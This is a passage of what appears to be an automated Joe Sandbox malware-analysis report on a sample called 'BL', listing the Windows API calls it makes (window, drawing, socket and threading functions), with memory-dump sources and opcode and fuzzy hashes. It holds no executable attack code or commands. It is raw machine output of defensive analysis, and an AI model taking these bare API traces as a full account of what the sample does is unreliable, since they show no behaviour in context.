• WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C385
• WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C392
Similarity
• API ID: PrivateProfile$SectionWrite$String
• API String ID: 2832842796-0
APIs
• GetClientRect.USER32(?,?), ref: 00447997
• GetCursorPos.USER32(?), ref: 004479A2
• ScreenToClient.USER32(?,?), ref: 004479BE
• WindowFromPoint.USER32(?,?), ref: 004479FF
• DefDlgProcW.USER32(?,00000020,?,?), ref: 00447A78
Similarity
• API ID: Client$CursorFromPointProcRectScreenWindow
• API String ID: 1822080540-0
APIs
• GetWindowRect.USER32(?,?), ref: 00447C1B
• ScreenToClient.USER32(?,?), ref: 00447C39
• SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C4C
• Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447C93
• EndPaint.USER32(?,?), ref: 00447CD1
Similarity
• API ID: ClientPaintRectRectangleScreenViewportWindow
• API String ID: 659298297-0
APIs
• GetCursorPos.USER32(?), ref: 004478A7
• TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478C3
• DefDlgProcW.USER32(?,0000007B,?,?,004A83D8,?,004A83D8,?), ref: 004478E7
• GetCursorPos.USER32(?), ref: 00447935
• TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 0044795B
Similarity
• API ID: CursorMenuPopupTrack$Proc
• API String ID: 1300944170-0
APIs
• EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
• EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
• ShowWindow.USER32(004A83D8,00000000,004A83D8,?,?), ref: 00448C37
• ShowWindow.USER32(004A83D8,00000004,004A83D8), ref: 00448C43
• EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
  • Part of subcall function 004413F0: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 0044140E
  • Part of subcall function 004413F0: GetWindowLongW.USER32(?,000000F0), ref: 00441452
  • Part of subcall function 004413F0: GetWindowLongW.USER32(?,000000F0), ref: 00441493
  • Part of subcall function 004413F0: SendMessageW.USER32(02ED1BC0,000000F1,00000000,00000000), ref: 004414C6
  • Part of subcall function 004413F0: SendMessageW.USER32(02ED1BC0,000000F1,00000001,00000000), ref: 004414F1
Similarity
• API ID: Window$EnableMessageSend$LongShow
• API String ID: 142311417-0
APIs
• _memset.LIBCMT ref: 0044955A
  • Part of subcall function 00433A98: _wcspbrk.LIBCMT ref: 00433AAC
• SendMessageW.USER32(?,00001060,00000000,00000004), ref: 004495B3
• _wcslen.LIBCMT ref: 004495C1
• _wcslen.LIBCMT ref: 004495CE
• SendMessageW.USER32(?,00001060,00000000,?), ref: 004495FF
Similarity
• API ID: MessageSend_wcslen$_memset_wcspbrk
• API String ID: 1843234404-0
Memory Dump Source
• Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_BL.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
APIs
• IsWindowVisible.USER32(?), ref: 00445721
• SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0044573C
• SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00445773
• _wcslen.LIBCMT ref: 004457A3
• CharUpperBuffW.USER32(00000000,00000000), ref: 004457AD
Similarity
• API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
• String ID:
• API String ID: 3087257052-0
APIs
• IsWindow.USER32(00000000), ref: 00459DEF
• GetForegroundWindow.USER32 ref: 00459E07
• GetDC.USER32(00000000), ref: 00459E44
• GetPixel.GDI32(00000000,?,00000000), ref: 00459E4F
• ReleaseDC.USER32(00000000,00000000), ref: 00459E8B
Similarity
• API ID: Window$ForegroundPixelRelease
• String ID:
• API String ID: 4156661090-0
APIs
  • Part of subcall function 004647A2: inet_addr.WSOCK32(?), ref: 004647C7
• socket.WSOCK32(00000002,00000001,00000006), ref: 00464985
• WSAGetLastError.WSOCK32(00000000,00000002,00000001,00000006,00000000), ref: 00464993
• connect.WSOCK32(00000000,00000000,00000010), ref: 004649CD
• WSAGetLastError.WSOCK32(00000000,00000000,00000000,00000010,00000002,00000001,00000006,00000000), ref: 004649F4
• closesocket.WSOCK32(00000000), ref: 00464A07
Similarity
• API ID: ErrorLast$closesocketconnectinet_addrsocket
• String ID:
• API String ID: 245547762-0
APIs
• DeleteObject.GDI32(00000000), ref: 00447151
• ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
• SelectObject.GDI32(?,00000000), ref: 004471A2
• BeginPath.GDI32(?), ref: 004471B7
• SelectObject.GDI32(?,00000000), ref: 004471DC
Similarity
• API ID: Object$Select$BeginCreateDeletePath
• String ID:
• API String ID: 2338827641-0
APIs
• Sleep.KERNEL32(00000000,00000000,?,?,?,?,004448B6,0000000F,?), ref: 0043771E
• QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,004448B6,0000000F,?), ref: 0043773C
• Sleep.KERNEL32(00000000,?,?,?,?,004448B6,0000000F,?), ref: 0043775C
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,004448B6,0000000F,?), ref: 00437767
Similarity
• API ID: CounterPerformanceQuerySleep
• String ID:
• API String ID: 2875609808-0
APIs
• SendMessageW.USER32 ref: 0046FD00
• SendMessageW.USER32(?,0000104C,00000000,?), ref: 0046FD2E
• SendMessageW.USER32(?,00001015,?,?), ref: 0046FD4B
• DestroyIcon.USER32(?), ref: 0046FD58
• DestroyIcon.USER32(?), ref: 0046FD5F
Similarity
• API ID: MessageSend$DestroyIcon
• String ID:
• API String ID: 3419509030-0
APIs
• __getptd.LIBCMT ref: 004175AE
  • Part of subcall function 00416C72: __getptd_noexit.LIBCMT ref: 00416C75
  • Part of subcall function 00416C72: __amsg_exit.LIBCMT ref: 00416C82
• __amsg_exit.LIBCMT ref: 004175CE
• __lock.LIBCMT ref: 004175DE
• InterlockedDecrement.KERNEL32(?), ref: 004175FB
• InterlockedIncrement.KERNEL32(02ED2D80), ref: 00417626
Similarity
• API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
• String ID:
• API String ID: 4271482742-0
                                                                                                                            APIs
                                                                                                                            • DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
                                                                                                                            • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                            • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                            • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                            • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Destroy$DeleteObjectWindow$Icon
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4023252218-0
                                                                                                                            • Opcode ID: 187bd120907745c88baacffad0920a9106e1cca1ea6db424662e0a83cd01c53e
                                                                                                                            • Instruction ID: d1816f9fa450f538fb043821254e2bd2cfb9ade9207d957631f6d0e9d50691b6
                                                                                                                            • Opcode Fuzzy Hash: 187bd120907745c88baacffad0920a9106e1cca1ea6db424662e0a83cd01c53e
                                                                                                                            • Instruction Fuzzy Hash: 05015E70300605ABCB20DF65D9D4B2B77A8BF14712B50452AFD04D7346EB38EC48CB69
                                                                                                                            APIs
                                                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00460342
                                                                                                                            • GetWindowTextW.USER32(00000000,00000100,00000100), ref: 00460357
                                                                                                                            • MessageBeep.USER32(00000000), ref: 0046036D
                                                                                                                            • KillTimer.USER32(?,0000040A), ref: 00460392
                                                                                                                            • EndDialog.USER32(?,00000001), ref: 004603AB
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3741023627-0
                                                                                                                            • Opcode ID: 5e0545b8da8baa7cb8324f4116d33f6edaa60507eab9176a587cebaf75a8c25b
                                                                                                                            • Instruction ID: 48c257e0c270193328064fa19c5b46d6a870d8092b70dfec968bdaebd9a60f08
                                                                                                                            • Opcode Fuzzy Hash: 5e0545b8da8baa7cb8324f4116d33f6edaa60507eab9176a587cebaf75a8c25b
                                                                                                                            • Instruction Fuzzy Hash: BE018831500300A7E7209B54DE5DBDB77A8BF44B05F00492EB681A25D0E7F8A584CB55
                                                                                                                            APIs
                                                                                                                            • SendMessageW.USER32(?,00001101,00000000,?), ref: 00455514
                                                                                                                            • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                            • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                            • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                            • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: DeleteDestroyObject$IconMessageSendWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1489400265-0
                                                                                                                            • Opcode ID: fb8346e1cf28bbdc4ad062342734fe1bacbf25b41774fd01ae6266dc65fad9d1
                                                                                                                            • Instruction ID: 68d82c845863845e83b9d92669df32d5d1b96a6c2c0272d07869f65424c05900
                                                                                                                            • Opcode Fuzzy Hash: fb8346e1cf28bbdc4ad062342734fe1bacbf25b41774fd01ae6266dc65fad9d1
                                                                                                                            • Instruction Fuzzy Hash: D9014F703006419BDB10EF65DED8A2A73A9FB44712B40455AFE05DB286DB78EC49CB68
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0043343D: InvalidateRect.USER32(?,00000000,00000001), ref: 004334BE
                                                                                                                            • DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
                                                                                                                            • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                            • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                            • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                            • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1042038666-0
                                                                                                                            • Opcode ID: 920ee65d6839c6288c76afce6441748d32e1b72318fe83d584ccefe2da360159
                                                                                                                            • Instruction ID: 707d1f3050e1f0ff98422ce5efa9f9a4d3559fdafbc0a23101ed238e91bf2869
                                                                                                                            • Opcode Fuzzy Hash: 920ee65d6839c6288c76afce6441748d32e1b72318fe83d584ccefe2da360159
                                                                                                                            • Instruction Fuzzy Hash: B2014B702006419BCB10AF65D9C8A2A33ACAF19322780456AFD05D7242DB28EC498B79
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2625713937-0
                                                                                                                            • Opcode ID: a89ec47609df172868659220a46891f09f78d761c189f4b7bb4a315096e7830c
                                                                                                                            • Instruction ID: 1b0d13c7bbaa275692c81ef4a4760df4fcf6218f807946f7e03cce85d1463269
                                                                                                                            • Opcode Fuzzy Hash: a89ec47609df172868659220a46891f09f78d761c189f4b7bb4a315096e7830c
                                                                                                                            • Instruction Fuzzy Hash: F7F0A4751052019BD7508F18EC0C70E7FA8FB4F325F04462EEA19932E0DB781546CBAD
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00411A35: _doexit.LIBCMT ref: 00411A41
                                                                                                                            • ___set_flsgetvalue.LIBCMT ref: 004140E1
                                                                                                                              • Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
                                                                                                                              • Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
                                                                                                                              • Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE
                                                                                                                            • ___fls_getvalue@4.LIBCMT ref: 004140EC
                                                                                                                              • Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72
                                                                                                                            • ___fls_setvalue@8.LIBCMT ref: 004140FF
                                                                                                                              • Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9
                                                                                                                            • GetLastError.KERNEL32(00000000,?,00000000), ref: 00414108
                                                                                                                            • ExitThread.KERNEL32 ref: 0041410F
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00414115
                                                                                                                            • __freefls@4.LIBCMT ref: 00414135
                                                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 00414148
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Value$CurrentThread__decode_pointer$ErrorExitImageLastNonwritable___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 132634196-0
                                                                                                                            • Opcode ID: dbe0df41a3d89f03eebcd77cedb8c7fbd95cde8327ee68e759feca9a6a87dff2
                                                                                                                            • Instruction ID: c6f54ac6c47f72d6c6be617d0ab0d95393642b3a08ca47198428750b18cc63fb
                                                                                                                            • Opcode Fuzzy Hash: dbe0df41a3d89f03eebcd77cedb8c7fbd95cde8327ee68e759feca9a6a87dff2
                                                                                                                            • Instruction Fuzzy Hash: EFE0B6318012096B8F0177F28E2A8DF3A2DAD56799B12842EBF10A3112DA6DD9D147AD
                                                                                                                            APIs
                                                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 00415610
                                                                                                                              • Part of subcall function 00418540: __FindPESection.LIBCMT ref: 0041859B
                                                                                                                            • __getptd_noexit.LIBCMT ref: 00415620
                                                                                                                            • CloseHandle.KERNEL32(?,?,0041566B), ref: 00415634
                                                                                                                            • __freeptd.LIBCMT ref: 0041563B
                                                                                                                            • ExitThread.KERNEL32 ref: 00415643
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseCurrentExitFindHandleImageNonwritableSectionThread__freeptd__getptd_noexit
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3798957060-0
                                                                                                                            • Opcode ID: d3b08fe511e09ca6ea2d918a54b62a74066439bca0a0e456eaad9824bd7e2a02
                                                                                                                            • Instruction ID: 5ad9b57b40d8b41da6f03c32f2a15b2799e0bbfe2e5ad1689210a27a588f1b2a
                                                                                                                            • Opcode Fuzzy Hash: d3b08fe511e09ca6ea2d918a54b62a74066439bca0a0e456eaad9824bd7e2a02
                                                                                                                            • Instruction Fuzzy Hash: 29E01A31501A1197C2212BB9AC097DE3255AF01F36F944A6EF81A952A0DB6CD98147AD
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00411A35: _doexit.LIBCMT ref: 00411A41
                                                                                                                            • ___set_flsgetvalue.LIBCMT ref: 00415690
                                                                                                                              • Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
                                                                                                                              • Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
                                                                                                                              • Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE
                                                                                                                            • ___fls_getvalue@4.LIBCMT ref: 0041569B
                                                                                                                              • Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72
                                                                                                                            • ___fls_setvalue@8.LIBCMT ref: 004156AD
                                                                                                                              • Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9
                                                                                                                            • GetLastError.KERNEL32(00000000,?,00000000), ref: 004156B6
                                                                                                                            • ExitThread.KERNEL32 ref: 004156BD
                                                                                                                            • __freefls@4.LIBCMT ref: 004156D9
                                                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 004156EC
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Value$__decode_pointer$CurrentErrorExitImageLastNonwritableThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1537469427-0
                                                                                                                            • Opcode ID: 99715b5f8e2ff19c7b8f3a2e2e0a417857e73ed83bc070766e6b29f9400adc7a
                                                                                                                            • Instruction ID: 6f4b581ce684dac4bce1a6396b1ab204a3b2196504341234b7a244e47b3a25b0
                                                                                                                            • Opcode Fuzzy Hash: 99715b5f8e2ff19c7b8f3a2e2e0a417857e73ed83bc070766e6b29f9400adc7a
                                                                                                                            • Instruction Fuzzy Hash: 83E0E6308003096BCF0037F29E1A9DF392DAD41389B52841E7E14B2122DE6DD9D1466D
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _malloc
                                                                                                                            • String ID: Default$|k
                                                                                                                            • API String ID: 1579825452-2254895183
                                                                                                                            • Opcode ID: fb2f27172e282b4819a4f10bf0192d96dd614055304b8ac60cfd395dc02fa5f1
                                                                                                                            • Instruction ID: 39a525bc613f0e7e9485e4ea944b13d532e73913c0a35fc25f8fa2b96209a7b9
                                                                                                                            • Opcode Fuzzy Hash: fb2f27172e282b4819a4f10bf0192d96dd614055304b8ac60cfd395dc02fa5f1
                                                                                                                            • Instruction Fuzzy Hash: 51F19F706083018BD714DF25C484A6BB7E5AF85314F64886FF885AB392D738EC55CB9B
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _memcmp
                                                                                                                            • String ID: '$[$h
                                                                                                                            • API String ID: 2931989736-1224472061
                                                                                                                            • Opcode ID: b65a2ba19e68ffe8a11284d2d069350b2f2ae6a9059e42b54d6f98484e49560c
                                                                                                                            • Instruction ID: c2eec353cbd26a418970a1643da97c958d9efd09d44d369c5aec2a2e92b02032
                                                                                                                            • Opcode Fuzzy Hash: b65a2ba19e68ffe8a11284d2d069350b2f2ae6a9059e42b54d6f98484e49560c
                                                                                                                            • Instruction Fuzzy Hash: EBE1B3756083858FE725CF28C8807ABBBE1FFC9304F18896EE89587341D7799849CB56
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _strncmp
                                                                                                                            • String ID: >$R$U
                                                                                                                            • API String ID: 909875538-1924298640
                                                                                                                            • Opcode ID: f9ebc198af2ab7ab0819517e001d9756788144751dce64bc403378e3fae079f3
                                                                                                                            • Instruction ID: f6794502b7c89560a677b30a08de70cb8bc1b17d125f16f135907c58c8460d8d
                                                                                                                            • Opcode Fuzzy Hash: f9ebc198af2ab7ab0819517e001d9756788144751dce64bc403378e3fae079f3
                                                                                                                            • Instruction Fuzzy Hash: 46E19C745083818FEB25CF29C49076BBBE1EFD9304F28496EE89587381D378E849CB56
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00442C52: _wcslen.LIBCMT ref: 00442C82
                                                                                                                            • CoInitialize.OLE32(00000000), ref: 0046CE18
                                                                                                                            • CoCreateInstance.OLE32(00482A50,00000000,00000001,004828B0,?), ref: 0046CE31
                                                                                                                            • CoUninitialize.OLE32 ref: 0046CE50
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
